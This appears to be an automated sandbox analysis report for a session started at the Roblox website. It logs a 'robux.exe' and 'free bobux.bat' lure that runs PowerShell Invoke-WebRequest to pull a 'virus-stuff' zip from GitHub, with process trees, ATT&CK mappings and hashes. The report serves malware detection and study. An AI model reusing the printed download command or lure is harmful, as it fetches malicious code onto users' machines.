hxxps://www[.]roblox[.]com/

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
14-07-2024 00:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://www.roblox.com/

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
148	1768	powershell.exe
150	1768	powershell.exe
168	1584	powershell.exe
170	1584	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
1768	powershell.exe
1584	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
3760	robux.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
144	raw.githubusercontent.com
145	raw.githubusercontent.com

Drops file in System32 directory 11 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat	svchost.exe

Delays execution with timeout.exe 4 IoCs

evasion

pid	Process
968	timeout.exe
3500	timeout.exe
4360	timeout.exe
3352	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1705699165-553239100-4129523827-1000\{14388E0B-3B7F-4C8E-918D-467B631803C4}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings	mspaint.exe
Key created	\REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings	mspaint.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 130046.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
2140	msedge.exe
2140	msedge.exe
3252	msedge.exe
3252	msedge.exe
752	identity_helper.exe
752	identity_helper.exe
3568	msedge.exe
3568	msedge.exe
2708	msedge.exe
2708	msedge.exe
1768	powershell.exe
1768	powershell.exe
1768	powershell.exe
4864	msedge.exe
4864	msedge.exe
4260	mspaint.exe
4260	mspaint.exe
4384	msedge.exe
4384	msedge.exe
4384	msedge.exe
4384	msedge.exe
3748	mspaint.exe
3748	mspaint.exe
1584	powershell.exe
1584	powershell.exe
1584	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 17 IoCs

pid	Process
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1768	powershell.exe
Token: SeDebugPrivilege	1584	powershell.exe

Suspicious use of FindShellTrayWindow 43 IoCs

pid	Process
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
4260	mspaint.exe
1996	OpenWith.exe
3748	mspaint.exe
1500	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3252 wrote to memory of 212	3252	msedge.exe	85
PID 3252 wrote to memory of 212	3252	msedge.exe	85
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2324	3252	msedge.exe	86
PID 3252 wrote to memory of 2140	3252	msedge.exe	87
PID 3252 wrote to memory of 2140	3252	msedge.exe	87
PID 3252 wrote to memory of 4484	3252	msedge.exe	88
PID 3252 wrote to memory of 4484	3252	msedge.exe	88
PID 3252 wrote to memory of 4484	3252	msedge.exe	88
PID 3252 wrote to memory of 4484	3252	msedge.exe	88
PID 3252 wrote to memory of 4484	3252	msedge.exe	88
PID 3252 wrote to memory of 4484	3252	msedge.exe	88
PID 3252 wrote to memory of 4484	3252	msedge.exe	88
PID 3252 wrote to memory of 4484	3252	msedge.exe	88
PID 3252 wrote to memory of 4484	3252	msedge.exe	88
PID 3252 wrote to memory of 4484	3252	msedge.exe	88
PID 3252 wrote to memory of 4484	3252	msedge.exe	88
PID 3252 wrote to memory of 4484	3252	msedge.exe	88
PID 3252 wrote to memory of 4484	3252	msedge.exe	88
PID 3252 wrote to memory of 4484	3252	msedge.exe	88
PID 3252 wrote to memory of 4484	3252	msedge.exe	88
PID 3252 wrote to memory of 4484	3252	msedge.exe	88
PID 3252 wrote to memory of 4484	3252	msedge.exe	88
PID 3252 wrote to memory of 4484	3252	msedge.exe	88
PID 3252 wrote to memory of 4484	3252	msedge.exe	88
PID 3252 wrote to memory of 4484	3252	msedge.exe	88

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.roblox.com/
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3252
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xb4,0x108,0x7ff9b00d46f8,0x7ff9b00d4708,0x7ff9b00d4718
  2⤵
  PID:212
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2188,120017843743569067,16260697727733789218,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2224 /prefetch:2
  2⤵
  PID:2324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2188,120017843743569067,16260697727733789218,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2188,120017843743569067,16260697727733789218,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2832 /prefetch:8
  2⤵
  PID:4484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,120017843743569067,16260697727733789218,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
  2⤵
  PID:1388
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,120017843743569067,16260697727733789218,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
  2⤵
  PID:3088
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,120017843743569067,16260697727733789218,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4784 /prefetch:1
  2⤵
  PID:3708
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,120017843743569067,16260697727733789218,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:1
  2⤵
  PID:1620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,120017843743569067,16260697727733789218,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:1
  2⤵
  PID:4732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,120017843743569067,16260697727733789218,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5572 /prefetch:1
  2⤵
  PID:4632
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2188,120017843743569067,16260697727733789218,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:8
  2⤵
  PID:784
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2188,120017843743569067,16260697727733789218,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,120017843743569067,16260697727733789218,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5352 /prefetch:1
  2⤵
  PID:4328
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,120017843743569067,16260697727733789218,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3716 /prefetch:1
  2⤵
  PID:1736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2188,120017843743569067,16260697727733789218,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5316 /prefetch:8
  2⤵
  PID:4324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2188,120017843743569067,16260697727733789218,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5696 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:3568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,120017843743569067,16260697727733789218,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4636 /prefetch:1
  2⤵
  PID:1768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,120017843743569067,16260697727733789218,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4588 /prefetch:1
  2⤵
  PID:1088
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,120017843743569067,16260697727733789218,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:1
  2⤵
  PID:4100
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,120017843743569067,16260697727733789218,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4948 /prefetch:1
  2⤵
  PID:3088
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,120017843743569067,16260697727733789218,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6136 /prefetch:1
  2⤵
  PID:1304
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,120017843743569067,16260697727733789218,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6368 /prefetch:1
  2⤵
  PID:2980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,120017843743569067,16260697727733789218,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6404 /prefetch:1
  2⤵
  PID:2108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2188,120017843743569067,16260697727733789218,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5676 /prefetch:8
  2⤵
  PID:1396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,120017843743569067,16260697727733789218,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1
  2⤵
  PID:920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2188,120017843743569067,16260697727733789218,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6744 /prefetch:8
  2⤵
  PID:4808
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2188,120017843743569067,16260697727733789218,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6864 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2708
- C:\Users\Admin\Downloads\robux.exe
  "C:\Users\Admin\Downloads\robux.exe"
  2⤵
  - Executes dropped EXE
  PID:3760
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\94C9.tmp\94CA.tmp\94CB.bat C:\Users\Admin\Downloads\robux.exe"
    3⤵
    PID:4996
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1768
  - - C:\Windows\system32\timeout.exe
      timeout /t 3 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3500
  - - C:\Windows\system32\timeout.exe
      timeout /t 3 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4360
  - - C:\Windows\system32\timeout.exe
      timeout /t 3 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,120017843743569067,16260697727733789218,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6476 /prefetch:1
  2⤵
  PID:4580
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2188,120017843743569067,16260697727733789218,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6412 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4864
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2188,120017843743569067,16260697727733789218,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5996 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4384

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4260

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:540

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4340

C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\Screenshot 9_8_2022 5_26_53 PM.png" /ForceBootstrapPaint3D
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4260

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s DsSvc
1⤵
- Drops file in System32 directory
PID:4492

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:1996

C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\free bobux - Notepad 9_8_2022 5_27_50 PM.png" /ForceBootstrapPaint3D
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3748

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:1500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\free bobux.bat" "
1⤵
PID:3760
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1584
- C:\Windows\system32\timeout.exe
  timeout /t 3 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:968

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
bafce9e4c53a0cb85310891b6b21791b

SHA1
5d70027cc137a7cbb38f5801b15fd97b05e89ee2

SHA256
71fb546b5d2210a56e90b448ee10120cd92c518c8f79fb960f01b918f89f2b00

SHA512
c0e4d3eccc0135ac92051539a18f64b8b8628cfe74e5b019d4f8e1dcbb51a9b49c486a1523885fe6be53da7118c013852e753c26a5490538c1e721fd0188836c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

